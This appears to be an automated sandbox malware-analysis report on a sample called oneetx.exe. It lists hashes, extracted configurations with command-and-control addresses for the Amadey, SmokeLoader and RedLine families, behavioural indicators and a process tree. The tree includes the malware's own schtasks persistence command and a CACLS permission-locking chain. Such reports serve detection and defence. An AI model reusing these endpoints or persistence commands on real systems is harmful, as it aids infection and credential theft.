Analysis
-
max time kernel
103s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
02/07/2023, 00:14
Behavioral task
behavioral1
Sample
oneetx.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
oneetx.exe
Resource
win10v2004-20230621-en
General
-
Target
oneetx.exe
-
Size
198KB
-
MD5
a64a886a695ed5fb9273e73241fec2f7
-
SHA1
363244ca05027c5beb938562df5b525a2428b405
-
SHA256
563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
-
SHA512
122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
SSDEEP
3072:lWgR9+o+G2K47yLk6E9EzwHxFTTDYUSNt2kLu5gf7or7wy+wXRcWfnPjt:lWu+5a4ukZSwH/TT2NE4u5gTovv
Malware Config
Extracted
amadey
3.83
5.42.65.80/8bmeVwqx/index.php
Extracted
gcleaner
45.12.253.56
45.12.253.72
45.12.253.98
45.12.253.75
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Extracted
redline
280623_rc_11
rcn.tuktuk.ug:11285
-
auth_value
7dbd026b7e6c26ab5e41958efd6a2a6e
Signatures
-
Glupteba payload 3 IoCs
resource yara_rule behavioral2/memory/2200-289-0x0000000002D60000-0x000000000364B000-memory.dmp family_glupteba behavioral2/memory/2200-298-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/2200-419-0x0000000002D60000-0x000000000364B000-memory.dmp family_glupteba -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs
description pid Process procid_target PID 2636 created 3172 2636 updChrome.exe 59 PID 2636 created 3172 2636 updChrome.exe 59 PID 2636 created 3172 2636 updChrome.exe 59 PID 2636 created 3172 2636 updChrome.exe 59 PID 1284 created 3172 1284 updChrome.exe 59 PID 2636 created 3172 2636 updChrome.exe 59 PID 1284 created 3172 1284 updChrome.exe 59 PID 1284 created 3172 1284 updChrome.exe 59 PID 1284 created 3172 1284 updChrome.exe 59 PID 1496 created 3172 1496 updChrome.exe 59 PID 1284 created 3172 1284 updChrome.exe 59 PID 1496 created 3172 1496 updChrome.exe 59 PID 1496 created 3172 1496 updChrome.exe 59 PID 1496 created 3172 1496 updChrome.exe 59 PID 1496 created 3172 1496 updChrome.exe 59 PID 5092 created 3172 5092 updater.exe 59 -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts updChrome.exe File created C:\Windows\System32\drivers\etc\hosts updChrome.exe File created C:\Windows\System32\drivers\etc\hosts updChrome.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 2680 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation setup.exe Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation oneetx.exe Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation oneetx.exe -
Executes dropped EXE 17 IoCs
pid Process 4080 oneetx.exe 2772 setup.exe 3748 updEdge.exe 2636 updChrome.exe 1020 toolspub2.exe 2940 updEdge.exe 4500 toolspub2.exe 1284 updChrome.exe 2200 3eef203fb515bda85f514e168abb5973.exe 4768 updEdge.exe 1496 updChrome.exe 220 oneetx.exe 2140 3eef203fb515bda85f514e168abb5973.exe 5092 updater.exe 2524 csrss.exe 1104 schtasks.exe 3816 injector.exe -
resource yara_rule behavioral2/files/0x000a000000023286-796.dat upx behavioral2/files/0x000a000000023286-797.dat upx behavioral2/files/0x000a000000023286-800.dat upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 3eef203fb515bda85f514e168abb5973.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 7 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1020 set thread context of 4500 1020 toolspub2.exe 105 PID 2940 set thread context of 2072 2940 updEdge.exe 117 PID 3748 set thread context of 3048 3748 updEdge.exe 119 PID 4768 set thread context of 2768 4768 updEdge.exe 122 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 3eef203fb515bda85f514e168abb5973.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe updChrome.exe File created C:\Program Files\Google\Chrome\updater.exe updChrome.exe File created C:\Program Files\Google\Chrome\updater.exe updChrome.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\rss 3eef203fb515bda85f514e168abb5973.exe File created C:\Windows\rss\csrss.exe 3eef203fb515bda85f514e168abb5973.exe -
Launches sc.exe 21 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3516 sc.exe 2216 sc.exe 1388 sc.exe 3848 sc.exe 868 sc.exe 3256 sc.exe 4100 sc.exe 1856 sc.exe 2032 sc.exe 1672 sc.exe 2652 sc.exe 3568 sc.exe 3492 sc.exe 4828 sc.exe 1564 sc.exe 4348 sc.exe 4268 sc.exe 2072 sc.exe 1908 sc.exe 3376 sc.exe 3004 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 1580 2772 WerFault.exe 97 4584 2772 WerFault.exe 97 2580 2772 WerFault.exe 97 4568 2772 WerFault.exe 97 1664 2772 WerFault.exe 97 3920 2772 WerFault.exe 97 3992 2772 WerFault.exe 97 2124 2772 WerFault.exe 97 3712 2772 WerFault.exe 97 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4528 schtasks.exe 3224 schtasks.exe 1104 schtasks.exe -
Kills process with taskkill 1 IoCs
pid Process 2680 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4500 toolspub2.exe 4500 toolspub2.exe 2636 updChrome.exe 2636 updChrome.exe 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 1284 updChrome.exe 1284 updChrome.exe 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3172 Explorer.EXE -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4500 toolspub2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeDebugPrivilege 3748 updEdge.exe Token: SeDebugPrivilege 2940 updEdge.exe Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeDebugPrivilege 4768 updEdge.exe Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeDebugPrivilege 3048 AppLaunch.exe Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeDebugPrivilege 2072 sc.exe Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeDebugPrivilege 2680 netsh.exe Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeDebugPrivilege 2768 AppLaunch.exe Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeDebugPrivilege 1388 powershell.exe Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeDebugPrivilege 4508 schtasks.exe Token: SeShutdownPrivilege 4476 powercfg.exe Token: SeCreatePagefilePrivilege 4476 powercfg.exe Token: SeDebugPrivilege 1124 powershell.exe Token: SeShutdownPrivilege 4496 powercfg.exe Token: SeCreatePagefilePrivilege 4496 powercfg.exe Token: SeShutdownPrivilege 2124 powercfg.exe Token: SeCreatePagefilePrivilege 2124 powercfg.exe Token: SeShutdownPrivilege 448 powercfg.exe Token: SeCreatePagefilePrivilege 448 powercfg.exe Token: SeIncreaseQuotaPrivilege 1124 powershell.exe Token: SeSecurityPrivilege 1124 powershell.exe Token: SeTakeOwnershipPrivilege 1124 powershell.exe Token: SeLoadDriverPrivilege 1124 powershell.exe Token: SeSystemProfilePrivilege 1124 powershell.exe Token: SeSystemtimePrivilege 1124 powershell.exe Token: SeProfSingleProcessPrivilege 1124 powershell.exe Token: SeIncBasePriorityPrivilege 1124 powershell.exe Token: SeCreatePagefilePrivilege 1124 powershell.exe Token: SeBackupPrivilege 1124 powershell.exe Token: SeRestorePrivilege 1124 powershell.exe Token: SeShutdownPrivilege 1124 powershell.exe Token: SeDebugPrivilege 1124 powershell.exe Token: SeSystemEnvironmentPrivilege 1124 powershell.exe Token: SeRemoteShutdownPrivilege 1124 powershell.exe Token: SeUndockPrivilege 1124 powershell.exe Token: SeManageVolumePrivilege 1124 powershell.exe Token: 33 1124 powershell.exe Token: 34 1124 powershell.exe Token: 35 1124 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2284 oneetx.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2284 wrote to memory of 4080 2284 oneetx.exe 86 PID 2284 wrote to memory of 4080 2284 oneetx.exe 86 PID 2284 wrote to memory of 4080 2284 oneetx.exe 86 PID 4080 wrote to memory of 4528 4080 oneetx.exe 87 PID 4080 wrote to memory of 4528 4080 oneetx.exe 87 PID 4080 wrote to memory of 4528 4080 oneetx.exe 87 PID 4080 wrote to memory of 3948 4080 oneetx.exe 89 PID 4080 wrote to memory of 3948 4080 oneetx.exe 89 PID 4080 wrote to memory of 3948 4080 oneetx.exe 89 PID 3948 wrote to memory of 4432 3948 cmd.exe 91 PID 3948 wrote to memory of 4432 3948 cmd.exe 91 PID 3948 wrote to memory of 4432 3948 cmd.exe 91 PID 3948 wrote to memory of 1108 3948 cmd.exe 92 PID 3948 wrote to memory of 1108 3948 cmd.exe 92 PID 3948 wrote to memory of 1108 3948 cmd.exe 92 PID 3948 wrote to memory of 4888 3948 cmd.exe 93 PID 3948 wrote to memory of 4888 3948 cmd.exe 93 PID 3948 wrote to memory of 4888 3948 cmd.exe 93 PID 3948 wrote to memory of 3232 3948 cmd.exe 94 PID 3948 wrote to memory of 3232 3948 cmd.exe 94 PID 3948 wrote to memory of 3232 3948 cmd.exe 94 PID 3948 wrote to memory of 1920 3948 cmd.exe 95 PID 3948 wrote to memory of 1920 3948 cmd.exe 95 PID 3948 wrote to memory of 1920 3948 cmd.exe 95 PID 3948 wrote to memory of 4280 3948 cmd.exe 96 PID 3948 wrote to memory of 4280 3948 cmd.exe 96 PID 3948 wrote to memory of 4280 3948 cmd.exe 96 PID 4080 wrote to memory of 2772 4080 oneetx.exe 97 PID 4080 wrote to memory of 2772 4080 oneetx.exe 97 PID 4080 wrote to memory of 2772 4080 oneetx.exe 97 PID 4080 wrote to memory of 3748 4080 oneetx.exe 98 PID 4080 wrote to memory of 3748 4080 oneetx.exe 98 PID 4080 wrote to memory of 3748 4080 oneetx.exe 98 PID 4080 wrote to memory of 2636 4080 oneetx.exe 101 PID 4080 wrote to memory of 2636 4080 oneetx.exe 101 PID 4080 wrote to memory of 1020 4080 oneetx.exe 102 PID 4080 wrote to memory of 1020 4080 oneetx.exe 102 PID 4080 wrote to memory of 1020 4080 oneetx.exe 102 PID 4080 wrote to memory of 2940 4080 oneetx.exe 103 PID 4080 wrote to memory of 2940 4080 oneetx.exe 103 PID 4080 wrote to memory of 2940 4080 oneetx.exe 103 PID 1020 wrote to memory of 4500 1020 toolspub2.exe 105 PID 1020 wrote to memory of 4500 1020 toolspub2.exe 105 PID 1020 wrote to memory of 4500 1020 toolspub2.exe 105 PID 1020 wrote to memory of 4500 1020 toolspub2.exe 105 PID 1020 wrote to memory of 4500 1020 toolspub2.exe 105 PID 1020 wrote to memory of 4500 1020 toolspub2.exe 105 PID 4080 wrote to memory of 1284 4080 oneetx.exe 107 PID 4080 wrote to memory of 1284 4080 oneetx.exe 107 PID 4080 wrote to memory of 2200 4080 oneetx.exe 108 PID 4080 wrote to memory of 2200 4080 oneetx.exe 108 PID 4080 wrote to memory of 2200 4080 oneetx.exe 108 PID 4080 wrote to memory of 4768 4080 oneetx.exe 111 PID 4080 wrote to memory of 4768 4080 oneetx.exe 111 PID 4080 wrote to memory of 4768 4080 oneetx.exe 111 PID 4080 wrote to memory of 1496 4080 oneetx.exe 112 PID 4080 wrote to memory of 1496 4080 oneetx.exe 112 PID 2940 wrote to memory of 2072 2940 updEdge.exe 117 PID 2940 wrote to memory of 2072 2940 updEdge.exe 117 PID 2940 wrote to memory of 2072 2940 updEdge.exe 117 PID 2940 wrote to memory of 2072 2940 updEdge.exe 117 PID 2940 wrote to memory of 2072 2940 updEdge.exe 117 PID 2940 wrote to memory of 2072 2940 updEdge.exe 117 PID 2940 wrote to memory of 2072 2940 updEdge.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\oneetx.exe"2⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F4⤵
- Creates scheduled task(s)
PID:4528
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:4432
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:N"5⤵PID:1108
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:R" /E5⤵PID:4888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3232
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:N"5⤵PID:1920
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:R" /E5⤵PID:4280
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:2772 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 6205⤵
- Program crash
PID:1580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 8805⤵
- Program crash
PID:4584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 8885⤵
- Program crash
PID:2580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 9725⤵
- Program crash
PID:4568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 9805⤵
- Program crash
PID:1664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 11125⤵
- Program crash
PID:3920
